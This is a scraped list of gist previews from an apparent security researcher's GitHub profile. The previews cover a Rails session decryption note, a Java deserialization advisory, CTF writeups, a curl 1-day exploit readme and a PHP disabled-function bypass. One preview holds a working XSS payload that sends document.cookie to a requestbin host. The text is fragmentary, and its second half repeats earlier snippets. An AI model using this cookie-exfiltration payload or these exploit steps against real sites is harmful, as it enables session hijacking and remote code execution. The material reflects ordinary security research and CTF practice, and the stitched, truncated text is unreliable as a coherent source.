{{1+1}} wupco

## Readme.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              4 stars
            
          
                JoshCheek
                / Readme.md
            
            
              Last active
              June 20, 2018 07:55
            
              
                Decrypting a Rails (v4.2.0) session
              
          
    How to get the values

Salts

$ rails runner 'Rails.application.config.action_dispatch.tap { |c| p encrypted_cookie_salt: c.encrypted_cookie_salt, encrypted_signed_cookie_salt: c.encrypted_signed_cookie_salt }'

Secret Key Base


## JAVA-ADVISORY.md

      
              1 file
            
          
              9 forks
            
          
              3 comments
            
          
              27 stars
            
          
                frohoff
                / JAVA-ADVISORY.md
            
            
              Last active
              August 28, 2023 19:08
            
              
                Java 7u21 Security Advisory
              
          
    Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management
Introduction


Affected Product(s): Java SE 6, Java SE 7
Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
Vendor Contact: secalert_us@oracle.com
Vulnerability Type: Unsafe Object Deserialization


## escape.js
////////
// The vm module lets you run a string containing javascript code 'in
// a sandbox', where you specify a context of global variables that
// exist for the duration of its execution. This works more or less
// well, and if you're in control of the code that's running, and you
// have a reasonable protocol in mind// for how it expects a certain
// context to exist and interacts with it --- like, maybe a plug-in
// API for a program, with some endpoints defined for it that do
// useful domain-specific things --- your life can go smoothly.

## h4x0rs.date
<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">

## insomnihack2019teaser_droops_writeup.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              5 stars
            
          
                paul-axe
                / insomnihack2019teaser_droops_writeup.md
            
            
              Created
              January 20, 2019 12:42
            
              
                insomnihack2019teaser_droops_writeup.md
              
          
    The challenge was based on drupal7 with obvious unserialize call added.
Trying to build a chain and the first solution i found was based on following chain:
./includes/bootstrap.inc
abstract class DrupalCacheArray
    ...
    public function __destruct() {
        $data = array();

  
## _readme.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              4 stars
            
          
                PaulCher
                / _readme.md
            
            
              Last active
              July 23, 2023 15:01
            
              
                curl 1-day exploit
              
          
Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
Update ip addresses at the source files
Launch srv.py on the server
Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'


## Readme.md

      
              4 files
            
          
              5 forks
            
          
              0 comments
            
          
              21 stars
            
          
                LoadLow
                / Readme.md
            
            
              Last active
              August 14, 2023 13:55
            
              
                Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())
              
          
    This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/
Credits: @hugeh0ge
It uses iconv, in php, in order to execute the same payload.
Uses cases :

You control the first parameter of iconv (in_charset), you can set an env var and you can upload arbitrary files (.so library file and the gconv-modules file) and you know their path.
You have a php RCE but system, shell_exec, curl_exec and other functions are disabled but you can setenv (and LD_PRELOAD is blacklisted).


## shell_exec.txt
10web-manager
4k-icon-fonts-for-visual-composer
accelerated-mobile-pages
accept-payments-wp
accu-auto-backup
ace-edit
ace-editor-for-wp
aceide
acelerator
acf-code-field

## gen_el_lua_py2_jvm.rb
#!/usr/bin/env ruby

# elisp, lua, python2, and jvm
# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/

$flag = File.read('flag').chomp

$ml_preamble = nil
$lua_preamble = nil
$ruby_preamble = nil

## solve.c
/*
gcc -m64 -nostdlib -Os -mrtm -fno-toplevel-reorder -static -Wno-multichar solve.c -o solve.elf
objcopy -Obinary -j .text solve.elf solve.bin
Reference https://github.com/Alberts-Coffee-Hours/Mastik/blob/master/src/l1.c,
https://github.com/vusec/ridl/blob/master/exploits/shadow/leak.c
and https://github.com/oranav/ctf-writeups/blob/master/gctf19/RIDL/solve.c
*/

#include <stdio.h>
#include <stdlib.h>
	////////
	// The vm module lets you run a string containing javascript code 'in
	// a sandbox', where you specify a context of global variables that
	// exist for the duration of its execution. This works more or less
	// well, and if you're in control of the code that's running, and you
	// have a reasonable protocol in mind// for how it expects a certain
	// context to exist and interacts with it --- like, maybe a plug-in
	// API for a program, with some endpoints defined for it that do
	// useful domain-specific things --- your life can go smoothly.
	<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
	<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">
	10web-manager
	4k-icon-fonts-for-visual-composer
	accelerated-mobile-pages
	accept-payments-wp
	accu-auto-backup
	ace-edit
	ace-editor-for-wp
	aceide
	acelerator
	acf-code-field
	#!/usr/bin/env ruby

	# elisp, lua, python2, and jvm
	# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/

	$flag = File.read('flag').chomp

	$ml_preamble = nil
	$lua_preamble = nil
	$ruby_preamble = nil
	/*
	gcc -m64 -nostdlib -Os -mrtm -fno-toplevel-reorder -static -Wno-multichar solve.c -o solve.elf
	objcopy -Obinary -j .text solve.elf solve.bin
	Reference https://github.com/Alberts-Coffee-Hours/Mastik/blob/master/src/l1.c,
	https://github.com/vusec/ridl/blob/master/exploits/shadow/leak.c
	and https://github.com/oranav/ctf-writeups/blob/master/gctf19/RIDL/solve.c
	*/

	#include <stdio.h>
	#include <stdlib.h>